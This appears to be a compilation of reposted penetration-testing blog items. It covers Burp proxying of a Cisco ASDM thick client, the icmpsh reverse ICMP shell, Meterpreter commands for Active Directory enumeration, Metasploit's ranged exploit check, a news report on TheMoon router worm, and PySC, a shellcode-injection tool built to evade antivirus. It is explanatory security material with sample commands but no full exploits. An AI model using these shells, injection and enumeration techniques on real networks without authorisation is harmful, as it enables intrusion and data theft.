talking about that uses Burp can be accomplished using the free version. Starting Burp with Admin Privileges So with a bit of caution and your fingers and toes crossed, you’re going to need to start up Burp with admin privileges. This may make some of you feel a little uncomfortable being that Burp is written in Java, but you’re going to need to give Burp additional privileges in a later step in this post. If running Java with admin privileges is still tugging at your spidey senses, you are welcome to run without admin privileges and bind to a port in the ephemeral port range. The only shortfall of doing this is that your thick client application may or may not allow you to change the server port that it connects to. If it doesn't allow you to change the port, you will need admin privileges to proceed. You can invoke Burp with admin privileges like this on Linux or Mac: sudo java -jar burpsuite_pro_v1.5.20.jar You can also add your own creative flair to the options supplied by this command and give Burp more memory, but that is outside of the scope of what we’ll need to get the job done. Adding a Proxy Listener w/ Redirection and Transport Proxying Ok, now we’re getting to the interesting stuff. This is going to require a little bit more explanation because it’s not a scenario you would see often. In the default Proxy Listener configuration that most people who use Burp are familiar with, you are provided with a CONNECT proxy listener bound to the loopback adapter on port 8080. This allows us to explicitly tell our browser where the proxy listener is and how to communicate with it. The difference when using a thick client that is not proxy aware is the need for the ability to point the thick client to the proxy. We need to do this because this is what will allow the proxy to see all the requests sent to the server. We can do this by adding an additional proxy listener on the loopback adapter and configuring it to act as the legitimate server to which the thick client needs to connect. Let's look at some screenshots on how to do this: Step 1: Visit the Proxy => Options configuration tab Note:This is the default listener that is provided in Burp Step 2: Click Add to add a proxy listener and add the bind port on the loopback Note: You can use the server port (ie. port 443 in the case of Cisco ASDM) if you invoked Burp with admin privileges, if not, choose something in the ephemeral range and then use that port later when you connect with the client. Step 3: Set a Redirect Host and Port and Enable Invisible Proxying Note: The redirect “binds” your locally mapped port to the remote service forming an SSL proxy that Burp can inspect. The invisible proxying tells Burp that its interface should be an emulated web server interface rather than the typical proxy style interface that’s used by default. Connect to the New Proxy Listener Now that we have everything all setup and ready, we can now take the Cisco ASDM client and connect to the newly created proxy listener as if it was the Cisco ASA device. So we fire up the Cisco ASDM client and point it at our proxy listener, like so: Note: Make sure you have the proxy intercept feature disabled, or authentication will timeout waiting for you to advance all the requests it needs to make to fully run. As the ASDM client attempts to login, you will see that the site map within Burp will begin to populate with all the various paths that are used by the ASDM client to gather information and configure the Cisco ASA. Here’s an example of what my site map looks like once ASDM has fully loaded. This tells us a lot about how the ASDM client works including its authentication process which in the very first request that is made to the firewall: As you can see the authentication is merely a post request that can be easily replicated in a script to quickly automate the process of credential checking Cisco ASA ASDM logins. This is what was actually captured in the Metasploit module I mentioned above. We can also leverage many of these paths that we can now see to perform the ASDM administration tasks directly without needing to deal with the restrictions imposed by the thick client interface. This also makes us more aware of the server attack surface so we can perform a more thorough assessment of the application. Conclusions So there you have it. That’s how easy it is to “reverse” the HTTPS transport layer of a thick client using some built-in features within Burp Suite. Not so bad, right? Well, I encourage you to find a thick client that you use in your daily work and use this process to see how it works under the hood. Maybe you can help automate some security checks for yourself or even use this process to help automate some administration tasks that were previously thought to be impossible. Either way, I’d be really happy to hear from anyone who reads this post and follows this process to see what his or her thick clients are doing inside the transport layer. See you next time! Source

Background Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this tool. Description icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine. The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker and I have ported it to Python too, hence this GitHub fork. Features Open source software - primarily coded by Nico, forked by me. Client/server architecture. The master is portable across any platform that can run either C, Perl or Python code. The target system has to be Windows because the slave runs on that platform only for now. The user running the slave on the target system does not require administrative privileges. Download: https://github.com/inquisb/icmpsh.git Source

Windows Meterpreter recently got some new capabilities thru the Extended API module by OJ Reeves also known as TheColonial. He added support for: Interacting with the Clipboard Query services Window enumeration Executing ADSI Queries The one that interest me the most is the second one because of many reasons, among them: I can query Active Directory for information on: Users Groups Policies Hosts I can query most of the information without the need of having Administrator privileges, just domain membership is enough for most or be running as SYSTEM on a machine joined to the domain. Lets start with the basics, when we get a Meterpreter session we need to check 2 things: Is the machine and user I'm running under a member of the Domain? Is the current session inside the network with access to a Domain Controller so it can query AD? There are several methods you can do by hand for this like checking list of processes and running getuid to see if we see Domain Membership under the users, but I prefer to automate any small tasks like that and for that Meterpreter Scripts are wonderful since they do not have that added typing and complexity of a post module for a simple task. For this I wrote a simple script I called get_domain name that can be found at . meterpreter > run get_domain_name -h Meterpreter Script for showing the domain name and prefered domain a host is a member of and the prefered DC. Author: Carlos Perez OPTIONS: -h Help menu. meterpreter > NOTE: IF you see anyone writing a Meterpreter script without a help block slap him for me The script will do 2 things: Check if the machine is part of a domain. Identify the preferred domain controller and try to resolve its name to IP. By trying to resolve the Domain Controller IP I can check if I'm in the domain or not. Execution is simple with the Run command: meterpreter > run get_domain_name [+] Domain: ACMELAB1 [+] Domain Controller: DC2.acmelab1.com [+] IPv4: 10.10.10.3 [*] Could not resolve IPv6 for DC2.acmelab1.com Here we can see the host is in a domain named ACMELAB1 and that we can resolve the IP Address of the Domain Controller. To query ADSI we need to fist load the Extended API extension, for this like with any other extension we use the Load command: meterpreter > load extapi Loading extension extapi...success. If we use the helpcommand or its alias ? we can see the commands are now available inside of the Meterpreter session: Extapi: Service Management Commands =================================== Command Description ------- ----------- service_enum Enumerate all registered Windows services service_query Query more detail about a specific Windows service Extapi: Clipboard Management Commands ===================================== Command Description ------- ----------- clipboard_get_data Read the victim's current clipboard (text, files, images) clipboard_set_text Write text to the victim's clipboard Extapi: ADSI Management Commands ================================ Command Description ------- ----------- adsi_computer_enum Enumerate all computers on the specified domain. adsi_domain_query Enumerate all objects on the specified domain that match a filter. adsi_user_enum Enumerate all users on the specified domain. 2 of the ADSI commands simplify the process of enumeration using it, these are: * adsicomputerenum - does basic computer account enumeration. * adsiuserenum - this one does basic user enumeration. If we look at the help options for one of the commands we will see they all have a Page Size and a Maximun number of results to get, this is becase AD can be very big and it can overwhelm Meterpreter. meterpreter > adsi_computer_enum -h Usage: adsi_computer_enum [-h] [-m maxresults] [-p pagesize] Enumerate the computers on the target domain. Enumeration returns information such as the computer name, desc, and comment. OPTIONS: -h Help banner -m Maximum results to return. -p Result set page size. Lets enumerate computer account: meterpreter > adsi_computer_enum acmelab1 acmelab1 Objects ================ name distinguishedname description comment ---- ----------------- ----------- ------- CLIEN01 CN=CLIEN01,CN=Computers,DC=acmelab1,DC=com COLLECTOR CN=COLLECTOR,OU=International Marketing,OU=Marketing,DC=acmelab1,DC=com DC1 CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com DC2 CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com DC3 CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com Total objects: 5 In the domain field we can also provide a LDAP Distinguished name also to control the scope of the query: meterpreter > adsi_computer_enum 'OU=Domain Controllers,DC=acmelab1,DC=com' OU=Domain Controllers,DC=acmelab1,DC=com Objects ================================================ name distinguishedname description comment ---- ----------------- ----------- ------- DC1 CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com DC2 CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com DC3 CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com Total objects: 3 For user accounts it functions in the same manner: meterpreter > adsi_user_enum acmelab1 -m 10 -p 10 acmelab1 Objects ================ samaccountname name distinguishedname description comment -------------- ---- ----------------- ----------- ------- Administrator Administrator CN=Administrator,CN=Users,DC=acmelab1,DC=com Built-in account for administering the computer/domain CLIEN01$ CLIEN01 CN=CLIEN01,CN=Computers,DC=acmelab1,DC=com DC1$ DC1 CN=DC1,OU=Domain Controllers,DC=acmelab1,DC=com DC2$ DC2 CN=DC2,OU=Domain Controllers,DC=acmelab1,DC=com DC3$ DC3 CN=DC3,OU=Domain Controllers,DC=acmelab1,DC=com Guest Guest CN=Guest,CN=Users,DC=acmelab1,DC=com Built-in account for guest access to the computer/domain cperez carlos Perez CN=carlos Perez,CN=Users,DC=acmelab1,DC=com helpdesk IT Helpdesk CN=IT Helpdesk,CN=Users,DC=acmelab1,DC=com krbtgt krbtgt CN=krbtgt,CN=Users,DC=acmelab1,DC=com Key Distribution Center Service Account krbtgt_28732 krbtgt_28732 CN=krbtgt_28732,CN=Users,DC=acmelab1,DC=com Key Distribution Center service account for read-only domain controller Total objects: 10 Now the command that provides the greatest flexibility is the the adsi_domain_query command since this one lets you craft your own queries and specify what fields you want. For these we need to use the LDAP Filtering Syntax, one of the best resources I have found for this is the SelfADSI page The command differs from the rest in that it lets you build your query and you can specify the fields. This can get tricky if you have no previous experience with LDAP and AD. You can check in MSDN, user PowerShell [adsisearcher] accelerator or use ADSI Edit on a lab Domain to figure the fields. Lets look for disabled accounts, get their name, disguishedname and description: meterpreter > adsi_domain_query acmelab1 (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)) name distinguishedname description acmelab1 Objects ================ name distinguishedname description ---- ----------------- ----------- Guest CN=Guest,CN=Users,DC=acmelab1,DC=com Built-in account for guest access to the computer/domain User15 CN=User15,CN=Users,DC=acmelab1,DC=com User28 CN=User28,CN=Users,DC=acmelab1,DC=com User36 CN=User36,CN=Users,DC=acmelab1,DC=com krbtgt CN=krbtgt,CN=Users,DC=acmelab1,DC=com Key Distribution Center Service Account krbtgt_28732 CN=krbtgt_28732,CN=Users,DC=acmelab1,DC=com Key Distribution Center service account for read-only domain controller Total objects: 6 Lets find all OUs in the Domain: meterpreter > adsi_domain_query acmelab1 (objectclass=organizationalunit) name distinguishedname acmelab1 Objects ================ name distinguishedname ---- ----------------- Domain Controllers OU=Domain Controllers,DC=acmelab1,DC=com ITS OU=ITS,DC=acmelab1,DC=com International Marketing OU=International Marketing,OU=Marketing,DC=acmelab1,DC=com Local Marketing OU=Local Marketing,OU=Marketing,DC=acmelab1,DC=com Marketing OU=Marketing,DC=acmelab1,DC=com Sales OU=Sales,DC=acmelab1,DC=com Total objects: 6 On tip when always testing queries is to use the name and disguishedname fields since these are present in most objects you query for and are useful for quick test. Based on the module and work from Metasploit contributor MearBalls on the enum_ad_computers module I wrote several post modules that I maintain in my own GitHub repo for enumerating AD information so as to not have to remember the queries and it saves to DB and Loot the info depending on the module. They can be found at all module start with enum_ad_. Source

One of the most popular requests I've received from professional penetration testers is that they often need to be able to break into a network as fast as possible, and as many as possible during an engagement. While Metasploit Pro or even the community edition already gives you a significant advantage in speed and efficiency, there is still quite a large group of hardcore Framework users out there, so we do whatever we can to improve everybody's hacking experience. A new trick we'd like to introduce today is the modified "check" command, which allows you to quickly identify vulnerable, or likely exploitable machines in a more accurate manner. However, you should also understand that Metasploit isn't a real vulnerability scanner even though it has checks. For your vulnerability scanning needs, we recommend using a real scanner like Nexpose (or whatever it is you prefer), and import the results to Metasploit. New Check Command Usage Before these changes, users could only run the check command one host at a time, which made it less practical against a large network. You could write resource scripts to overcome this problem, but in reality not everybody is equipped with hands-on programming experience in Ruby and the Metasploit API. Well, this is no longer a challenge starting today. What you can do now is being able to check a range of hosts with whatever exploit or auxiliary module you're using, and you can specify the number of threads needed to perform this task. A very basic usage is demonstrated below: msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set rhost 192.168.0.123 rhost => 192.168.0.123 msf exploit(ms08_067_netapi) > check Or it can be as simple as the following without the need to specify the RHOST or RHOSTS datastore option (auxiliary scanning modules use RHOSTS): msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > check 192.168.0.100-192.168.0.120 The default thread count is 1, but this is configurable. How many threads you can create depends on your system, so we advice you play around with it a little bit with a process monitor tool and decide for yourself. Here's an example of running a multi-threaded check to make the module scan faster: msf exploit(ms08_067_netapi) > set THREADS 10 THREADS => 10 msf exploit(ms08_067_netapi) > check 192.168.1.1/24 Please note that all checks now are also less verbose than before by default, but if you prefer to be more well informed about what's happening, you can always set the VERBOSE datastore option to true. New CheckCode Definitions While adding this new feature to Metasploit, we also spent quite a lot of time redefining check codes and tweaking hundreds of existing modules and other files as an effort to allow users to better understand what the check is telling them, and use the module with more confidence. Please take your time to read the new guidelines before you decide to exploit anything: Exploit::CheckCode::Unknown - The module fails to retrieve enough information from the target machine, such as due to a timeout or some kind of connection issue. Exploit::CheckCode::Safe - The check fails to trigger the vulnerability, or even detect the service. Exploit::CheckCode::Detected- The target is running the service in question, but the check fails to determine whether the target is vulnerable or not. Exploit::CheckCode::Appears - This is used if the vulnerability is determined based on passive reconnaissance. For example: version, banner grabbing, or simply having the resource that's known to be vulnerable. There is no solid proof whether the target machine is actually exploitable or not. Exploit::CheckCode::Vulnerable - The check is able to actually take advantage of the bug, and obtain some sort of hard evidence. For example: for a command execution type bug, it's able to execute a command and obtain an expected output. For a directory traversal, read a file from the target, etc. This level of check is pretty aggressive in nature, but normally shouldn't be DoSing the host as a way to prove the vulnerability. Exploit::CheckCode::Unsupported - The module does not support the check method. Module Developers If you're interested in Metasploit module development, please also read our guidelines on how to write a check() method here. And that's it for today. Current Metasploit users can simply run msfupdate and you shall receive these changes. However, to maximize your lightning-fast pwn power, feel free to try out Metasploit Pro or the community edition (free), and watch our recently-made video from David 'TheLightCosine' Maloney on "From Framework to Pro: How to Use Metasploit Pro in Penetration Tests." Source

A self-replicating program infects Linksys routers by exploiting an authentication bypass vulnerability IDG News Service - A self-replicating program is infecting Linksys routers by exploiting an authentication bypass vulnerability in various models from the vendor's E-Series product line. Researchers from SANS Institute's Internet Storm Center (ISC) issued an alert Wednesday about incidents where Linksys E1000 and E1200 routers had been compromised and were scanning other IP (Internet Protocol) address ranges on ports 80 and 8080. On Thursday the ISC researchers reported that they managed to capture the malware responsible for the scanning activity in one of their honeypots -- systems intentionally left exposed to be attacked. The attacks seems to be the result of a worm -- a self-replicating program -- that compromises Linksys routers and then uses those routers to scan for other vulnerable devices. "At this point, we are aware of a worm that is spreading among various models of Linksys routers," said Johannes Ullrich, the chief technology officer at SANS ISC, in a separate blog post. "We do not have a definite list of routers that are vulnerable, but the following routers may be vulnerable depending on firmware version: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900." The worm, which has been dubbed TheMoon because it contains the logo of Lunar Industries, a fictitious company from the 2009 movie "The Moon," begins by requesting a /HNAP1/ URL from devices behind the scanned IP addresses. HNAP -- the Home Network Administration Protocol -- was developed by Cisco and allows identification, configuration and management of networking devices. The worm sends the HNAP request in order to identify the router's model and firmware version. If it determines that a device is vulnerable, it sends another request to a particular CGI script that allows the execution of local commands on the device. SANS has not disclosed the name of the CGI script because it contains an authentication bypass vulnerability. "The request does not require authentication," Ullrich said. "The worm sends random 'admin' credentials but they are not checked by the script." The worm exploits this vulnerability to download and execute a binary file in ELF (Executable and Linkable) format compiled for the MIPS platform. When executed on a new router, this binary begins scanning for new devices to infect. It also opens an HTTP server on a random low-numbered port and uses it to serve a copy of itself to the newly identified targets. The binary contains a hardcoded list of over 670 IP address ranges that it scans, Ullrich said. "All appear to be linked to cable or DSL modem ISPs in various countries." It's not clear what the purpose of the malware is other than spreading to additional devices. There are some strings in the binary that suggest the existence of a command-and-control server, which would make the threat a botnet that attackers could control remotely. Linksys is aware of the vulnerability in some E-Series routers and is working on a fix, said Mike Duin, a spokesman for Linksys owner Belkin, in an email Friday. Ullrich outlined several mitigation strategies in comments to his blog post. First of all, routers that are not configured for remote administration are not directly exposed to this attack. If a router needs to be administered remotely, restricting access to the administrative interface by IP address will help reduce the risk, Ullrich said. Changing the port of the interface to something other than 80 or 8080, will also prevent this particular attack, he said. Via Worm 'TheMoon' infects Linksys routers - Network World

PySC - Download shellcode from a remote DNS server (using TXT records) or through Internet Explorer (using SSPI to utilize system-wide proxy settings and authorization tokens) and injects it into a specified process PySC expands on the numerous available tools and scripts to inject into a process on a running system. Aims of this project: - Remove shellcode from the script to help avoid detection by AV and HIPS systems - Offer a flexible command line based script - Also provide the ability to run fully automated, as an EXE (by using pyinstaller) To this end this prototype script offers the ability to download shellcode from a remote DNS server (using TXT records) or through Internet Explorer (using SSPI to utilize system-wide proxy settings and authorization tokens) and injects it into a specified process. If injection into the specified process is not possible, the script falls back to injecting into the current process. Module dependancies: none Optional: --> Includes server-side code for Metasploit and Python SCAPY for delivery of shellcode YMMV Download: https://github.com/ChrisJohnRiley/PySC.git Sources: https://github.com/ChrisJohnRiley/PySC {quick post} PySC Project | C????²² (in)s??u?it? / ChrisJohnRiley